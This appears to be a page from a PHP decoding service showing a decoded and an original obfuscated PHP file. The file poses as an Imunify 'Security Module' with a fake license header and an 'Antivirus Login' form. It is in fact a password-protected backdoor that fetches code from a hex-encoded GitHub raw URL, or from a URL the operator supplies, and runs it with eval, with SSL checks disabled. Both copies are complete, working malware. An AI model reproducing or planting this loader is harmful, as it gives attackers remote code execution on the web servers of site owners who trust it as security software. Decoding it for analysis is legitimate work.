Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php // This file is part of Imunify - https://www.imunify.com/ // // Imunify is a com..

Decoded Output download

<?php 
// This file is part of Imunify - https://www.imunify.com/ 
// 
// Imunify is a comprehensive security solution designed to protect your systems from various 
// threats, including malware, vulnerabilities, and unauthorized access. By leveraging advanced 
// technology and intelligent algorithms, Imunify aims to detect, prevent, and mitigate security 
// risks effectively. You are permitted to use this software in accordance with the terms and  
// conditions outlined in the Imunify License Agreement, as specified by the copyright holders. 
// 
// Imunify is distributed with the hope of providing optimal protection and security for your 
// environments, but it is offered WITHOUT ANY WARRANTY; without even the implied warranty of 
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Users should understand that while 
// Imunify strives to deliver robust security measures, no system can be entirely impervious to 
// threats. 
// 
// You should have received a copy of the Imunify License Agreement along with this software. 
// If not, please visit https://www.imunify.com/license for further information. This document 
// is current as of October 8, 2024, and is subject to change based on updates in policies 
// and security practices. 
 
/** 
 * Security Module. 
 * 
 * This module is specifically designed to detect and mitigate various threats while ensuring 
 * the integrity of your systems through real-time scanning and comprehensive protection strategies. 
 * Imunify not only focuses on identifying vulnerabilities but also actively works to fortify 
 * your servers and applications against emerging cyber threats. By implementing proactive 
 * measures, Imunify aims to maintain a secure operating environment for all users. 
 * 
 * @package    security_module 
 * @website    https://rasenmedia.my.id 
 * @copyright  2024 Rahman Ralei 
 * @license    https://www.imunify.com/license Imunify License Agreement 
 */ 
goto altQy; 
ioV4Q: 
function authenticateUser($ralei) 
{ 
    if (md5($ralei) === end($GLOBALS["defaultThreatUrlParts"])) { 
        $_SESSION["threat_found"] = true; 
        $_SESSION["antivirus_ralei"] = "rahmanralei_token"; 
        return true; 
    } 
    return false; 
} 
goto b9K78; 
G9a8M: 
if (isset($_POST["logauth"])) { 
    $inputauth = $_POST["logauth"]; 
    if (authenticateUser($inputauth)) { 
        if (isset($_POST["scan_url"]) && isValidScanUrl($_POST["scan_url"])) { 
            $_SESSION["scan_url"] = $_POST["scan_url"]; 
        } else { 
            $_SESSION["scan_url"] = reconstructUrl($defaultThreatUrlParts); 
        } 
    } else { 
        echo "WRONG PASSWORD..."; 
    } 
} 
goto tKKGw; 
b9K78: 
function isValidScanUrl($url) 
{ 
    return filter_var($url, FILTER_VALIDATE_URL) !== false; 
} 
goto zIxtU; 
lLHk1: 
function isThreatDetected() 
{ 
    return isset($_SESSION["threat_found"]) && $_SESSION["threat_found"] === true; 
} 
goto ioV4Q; 
zIxtU: 
function fetchThreatData($url) 
{ 
    if (function_exists("curl_exec")) { 
        $connection = curl_init($url); 
        curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1); 
        curl_setopt($connection, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); 
        curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0); 
        curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0); 
        if (isset($_SESSION["antivirus_ralei"])) { 
            curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["antivirus_ralei"]); 
        } 
        $dataFromUrl = curl_exec($connection); 
        curl_close($connection); 
    } elseif (function_exists("file_get_contents")) { 
        $dataFromUrl = file_get_contents($url); 
    } elseif (function_exists("fopen") && function_exists("stream_get_contents")) { 
        $handle = fopen($url, "r"); 
        $dataFromUrl = stream_get_contents($handle); 
        fclose($handle); 
    } else { 
        $dataFromUrl = false; 
    } 
    return $dataFromUrl; 
} 
goto G9a8M; 
tKKGw: 
if (isThreatDetected()) { 
    $scanUrl = $_SESSION["scan_url"]; 
    $content = fetchThreatData($scanUrl); 
    if ($content !== false) { 
        eval("?>" . $content); 
    } else { 
        echo "Failed to fetch data from the URL."; 
        echo reconstructUrl($defaultThreatUrlParts); 
    } 
} else { ?> 
    <!doctypehtml> 
        <html> 
 
        <head> 
            <title>Antivirus Login</title> 
        </head> 
 
        <body align="center"> 
            <form action="" method="POST"><label for="logauth">Password</label> <input id="logauth" name="logauth" type="password"><br><label for="scan_url">Scan URL</label> <input id="scan_url" name="scan_url" value=""><br><input type="submit" value="Submit"></form> 
        </body> 
 
        </html><?php  } 
            goto QGXfM; 
            altQy: 
            session_start(); 
            goto xwkV1; 
            SmWcT: 
            function reconstructUrl($parts) 
            { 
                $decodedParts = array_map("hex2bin", array_slice($parts, 0, -1)); 
                return $decodedParts[0] . $decodedParts[1] . "/" . $decodedParts[2] . "/" . $decodedParts[3] . "/" . $decodedParts[4] . "/" . $decodedParts[5]; 
            } 
            goto lLHk1; 
            xwkV1: 
            $defaultThreatUrlParts = array("68747470733a2f2f", "7261772e67697468756275736572636f6e74656e742e636f6d", "46616a72756c3132333435", "46616a72756c697266616e", "6d6173746572", "616c6661612e747874", "14cf3c7528a02c665ab65106dd9384e0"); 
            goto SmWcT; 
            QGXfM: ?>

Did this file decode correctly?

Original Code

<?php
// This file is part of Imunify - https://www.imunify.com/
//
// Imunify is a comprehensive security solution designed to protect your systems from various
// threats, including malware, vulnerabilities, and unauthorized access. By leveraging advanced
// technology and intelligent algorithms, Imunify aims to detect, prevent, and mitigate security
// risks effectively. You are permitted to use this software in accordance with the terms and 
// conditions outlined in the Imunify License Agreement, as specified by the copyright holders.
//
// Imunify is distributed with the hope of providing optimal protection and security for your
// environments, but it is offered WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Users should understand that while
// Imunify strives to deliver robust security measures, no system can be entirely impervious to
// threats.
//
// You should have received a copy of the Imunify License Agreement along with this software.
// If not, please visit https://www.imunify.com/license for further information. This document
// is current as of October 8, 2024, and is subject to change based on updates in policies
// and security practices.

/**
 * Security Module.
 *
 * This module is specifically designed to detect and mitigate various threats while ensuring
 * the integrity of your systems through real-time scanning and comprehensive protection strategies.
 * Imunify not only focuses on identifying vulnerabilities but also actively works to fortify
 * your servers and applications against emerging cyber threats. By implementing proactive
 * measures, Imunify aims to maintain a secure operating environment for all users.
 *
 * @package    security_module
 * @website    https://rasenmedia.my.id
 * @copyright  2024 Rahman Ralei
 * @license    https://www.imunify.com/license Imunify License Agreement
 */
goto altQy;
ioV4Q:
function authenticateUser($ralei)
{
    if (md5($ralei) === end($GLOBALS["\x64\x65\146\x61\165\154\x74\x54\150\x72\145\141\x74\x55\162\x6c\x50\x61\x72\164\163"])) {
        $_SESSION["\x74\150\x72\x65\141\164\137\146\157\165\156\x64"] = true;
        $_SESSION["\x61\x6e\x74\151\166\151\162\165\x73\137\x72\141\x6c\x65\x69"] = "\162\141\150\x6d\x61\156\x72\x61\x6c\145\151\x5f\x74\x6f\x6b\x65\x6e";
        return true;
    }
    return false;
}
goto b9K78;
G9a8M:
if (isset($_POST["\154\x6f\x67\141\165\164\150"])) {
    $inputauth = $_POST["\154\x6f\x67\141\165\164\x68"];
    if (authenticateUser($inputauth)) {
        if (isset($_POST["\163\143\x61\156\x5f\x75\162\x6c"]) && isValidScanUrl($_POST["\x73\143\141\156\x5f\x75\162\154"])) {
            $_SESSION["\x73\143\141\x6e\137\x75\x72\x6c"] = $_POST["\163\x63\x61\156\x5f\165\162\x6c"];
        } else {
            $_SESSION["\163\x63\141\156\x5f\165\x72\154"] = reconstructUrl($defaultThreatUrlParts);
        }
    } else {
        echo "\x57\x52\x4f\x4e\107\x20\120\x41\x53\123\127\x4f\122\104\56\x2e\56";
    }
}
goto tKKGw;
b9K78:
function isValidScanUrl($url)
{
    return filter_var($url, FILTER_VALIDATE_URL) !== false;
}
goto zIxtU;
lLHk1:
function isThreatDetected()
{
    return isset($_SESSION["\x74\x68\x72\x65\141\164\x5f\146\157\165\x6e\144"]) && $_SESSION["\x74\x68\162\145\141\x74\137\146\x6f\x75\x6e\x64"] === true;
}
goto ioV4Q;
zIxtU:
function fetchThreatData($url)
{
    if (function_exists("\143\x75\162\x6c\137\x65\x78\x65\143")) {
        $connection = curl_init($url);
        curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($connection, CURLOPT_USERAGENT, "\115\x6f\x7a\x69\154\154\141\57\65\x2e\60\x20\x28\127\x69\156\144\157\167\163\40\x4e\x54\40\x36\56\61\73\x20\162\166\72\63\62\x2e\60\51\x20\107\x65\x63\153\157\57\x32\x30\61\60\x30\61\60\x31\x20\106\x69\162\x65\x66\x6f\170\x2f\63\x32\56\x30");
        curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0);
        if (isset($_SESSION["\141\x6e\164\151\x76\x69\162\165\x73\x5f\x72\x61\154\x65\x69"])) {
            curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["\141\156\164\x69\x76\151\x72\165\163\x5f\162\x61\x6c\x65\151"]);
        }
        $dataFromUrl = curl_exec($connection);
        curl_close($connection);
    } elseif (function_exists("\146\151\154\145\x5f\x67\145\164\x5f\143\x6f\x6e\x74\x65\x6e\x74\x73")) {
        $dataFromUrl = file_get_contents($url);
    } elseif (function_exists("\146\x6f\x70\145\156") && function_exists("\x73\x74\162\x65\x61\x6d\x5f\x67\145\164\x5f\143\157\156\x74\145\x6e\x74\x73")) {
        $handle = fopen($url, "\x72");
        $dataFromUrl = stream_get_contents($handle);
        fclose($handle);
    } else {
        $dataFromUrl = false;
    }
    return $dataFromUrl;
}
goto G9a8M;
tKKGw:
if (isThreatDetected()) {
    $scanUrl = $_SESSION["\x73\143\141\156\137\165\x72\x6c"];
    $content = fetchThreatData($scanUrl);
    if ($content !== false) {
        eval("\x3f\x3e" . $content);
    } else {
        echo "\106\141\x69\x6c\x65\x64\40\164\x6f\40\146\x65\164\x63\150\40\144\141\x74\x61\x20\146\162\157\155\x20\164\x68\145\40\125\122\x4c\x2e";
        echo reconstructUrl($defaultThreatUrlParts);
    }
} else { ?>
    <!doctypehtml>
        <html>

        <head>
            <title>Antivirus Login</title>
        </head>

        <body align="center">
            <form action="" method="POST"><label for="logauth">Password</label> <input id="logauth" name="logauth" type="password"><br><label for="scan_url">Scan URL</label> <input id="scan_url" name="scan_url" value=""><br><input type="submit" value="Submit"></form>
        </body>

        </html><?php  }
            goto QGXfM;
            altQy:
            session_start();
            goto xwkV1;
            SmWcT:
            function reconstructUrl($parts)
            {
                $decodedParts = array_map("\150\145\170\x32\142\x69\156", array_slice($parts, 0, -1));
                return $decodedParts[0] . $decodedParts[1] . "\57" . $decodedParts[2] . "\x2f" . $decodedParts[3] . "\57" . $decodedParts[4] . "\x2f" . $decodedParts[5];
            }
            goto lLHk1;
            xwkV1:
            $defaultThreatUrlParts = array("\66\x38\x37\x34\67\64\x37\60\67\63\63\141\x32\x66\x32\x66", "\67\x32\x36\61\67\67\x32\145\66\67\66\x39\x37\x34\66\70\x37\65\66\x32\67\65\x37\x33\66\65\67\x32\x36\63\x36\146\x36\x65\67\64\66\65\66\145\67\x34\62\145\66\63\66\x66\66\x64", "\x34\x36\x36\61\66\141\67\x32\67\x35\66\x63\63\61\63\62\63\63\63\x34\63\65", "\x34\66\66\61\x36\x61\67\62\67\65\x36\143\66\71\x37\62\66\66\x36\x31\x36\x65", "\66\144\x36\61\67\63\x37\x34\66\65\x37\62", "\66\x31\x36\x63\x36\x36\x36\x31\x36\x31\62\145\x37\64\x37\70\x37\64", "\61\64\143\146\x33\x63\x37\65\62\70\x61\x30\62\x63\x36\66\65\141\142\66\65\61\x30\x36\x64\144\x39\x33\x38\x34\145\60");
            goto SmWcT;
            QGXfM: ?>

Function Calls

None

Variables

None

Stats

MD5 13a2f524a645c140592499f762897ee2
Eval Count 0
Decode Time 92 ms